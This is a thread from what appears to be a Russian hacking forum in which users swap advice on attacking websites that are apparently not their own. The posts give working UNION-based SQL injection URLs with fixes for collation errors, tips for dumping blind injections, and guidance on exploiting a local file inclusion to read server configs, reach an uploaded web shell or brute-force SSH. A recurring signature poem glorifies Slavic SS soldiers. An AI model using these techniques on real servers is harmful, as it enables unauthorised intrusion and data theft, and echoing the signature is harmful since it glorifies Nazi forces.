17.06.2012, 13:26
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
to briz
rsaUnDumper, sqlmap, toolza
Да много еще, Вы, молодой человек, плохо искали!
|
|
|
17.06.2012, 13:32
|
|
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами:
7339286
Репутация:
0
|
|
Столкнулся с проблемой:
1) Есть 2 сервера, которые как-то слинкованы между собой - т.е. с одного можно читать файлы другого и наоборот.
2) Найдена функция позволяющая читать содержимое файла и вот хз, что это. Скорее всего релинковка через htaccess
3) Добрался до конфигов, кроме httpd, логи же вообще читать не позволяет, хотя установил место-положение.
4) Пути до 2 сервера не могу найти ну вообще никак - логический перебор названий ни к чему не привел, при этом раскрытия путей точно нет. Читать из веба файлы он отказывается, что делать?
5) Файлы судя по всему хранятся не по тому адресу, что показываются - как результат напрямую запросить залитый шелл не могу, и логический перебор опять же не помог.
Что можно сделать? Куда копать? Имеет ли смысл вообще раскручивать этот способ или браться за поиск других ошибок?
PS /proc/sys/ и етк спокойно читаются.
PS это дебиан -_-
|
|
|
|
17.06.2012, 13:51
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от briz
Подскажите, пожалуйста, нубу.. Каким образом дампится блинд sql скуль? знаю количество столбцов, имя бд, таблицы и столбцов.. Попробовал несколько паблик прог - не катит..
посимвольно,через вывод ошибок...
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
17.06.2012, 20:58
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+
Сообщение от None
Нормальный вывод
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+
Сообщение от None
Illegal mix of collations (cp1251_general_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
Как боротся? |
|
|
|
17.06.2012, 22:40
|
|
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами:
7339286
Репутация:
0
|
|
Собственно интересно как можно оказаться воздействие на переменные окружения при:
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
_=/usr/sbin/apache2
|
|
|
|
17.06.2012, 22:46
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Pirotexnik
aes_decrypt(aes_encrypt(user()))
RuDefc0n
там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ
|
|
|
|
17.06.2012, 22:55
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
С нами:
9030566
Репутация:
2017
|
|
Сообщение от Pirotexnik
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,5+--+
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,user()+--+
Как боротся?
http://www.site.ru/id.php?id=-1110+union+select+1,2,3,4,unhex(hex(user()))+--+
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
17.06.2012, 23:50
|
|
Познающий
Регистрация: 02.06.2012
Сообщений: 33
С нами:
7339286
Репутация:
0
|
|
Сообщение от Konqi
Pirotexnik
aes_decrypt(aes_encrypt(user()))
RuDefc0n
там нету переменных окружения. следовательно никак не можете. если я правильно понял у вас LFI с /proc/self/environ
По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.
Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.
|
|
|
|
18.06.2012, 00:41
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от RuDefc0n
По сути полноценный lfi, только вот он читает файлы, а не запускает. Логи почитать не дает + реальный путь никак не вытащить до папки, где нахожусь - разве что перебором, но нативный логический перебор не помог.
Кучу конфигов уже перечитал. Судя по всему конкретно в той папке откуда обычно читает не исполняются файлы. Пока из всего только остается брутить ssh, но это наркоманство.
по информации из environ видно что там наверняка дебиан бейсд дистро какой то (debian/ubuntu), пробовал читать /etc/apache2/conf/apache2.conf ? там спалишь пути к htdocs, а дальше читаем скрипты..
|
|
|
|
18.06.2012, 01:17
|
|
Постоянный
Регистрация: 13.10.2010
Сообщений: 375
С нами:
8200406
Репутация:
38
|
|
Что-то я не врубился О_0
-1110+union+select+1,2,3,4,aes_decrypt(aes_encrypt( user()))+--+
Сообщение от None
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ')) -- order by rus' at line 1
-1110+union+select+1,2,3,4,unhex(hex(user()))+--+
Сообщение от None
You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '(hex(user())) -- order by rus' at line 1
Что за? |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
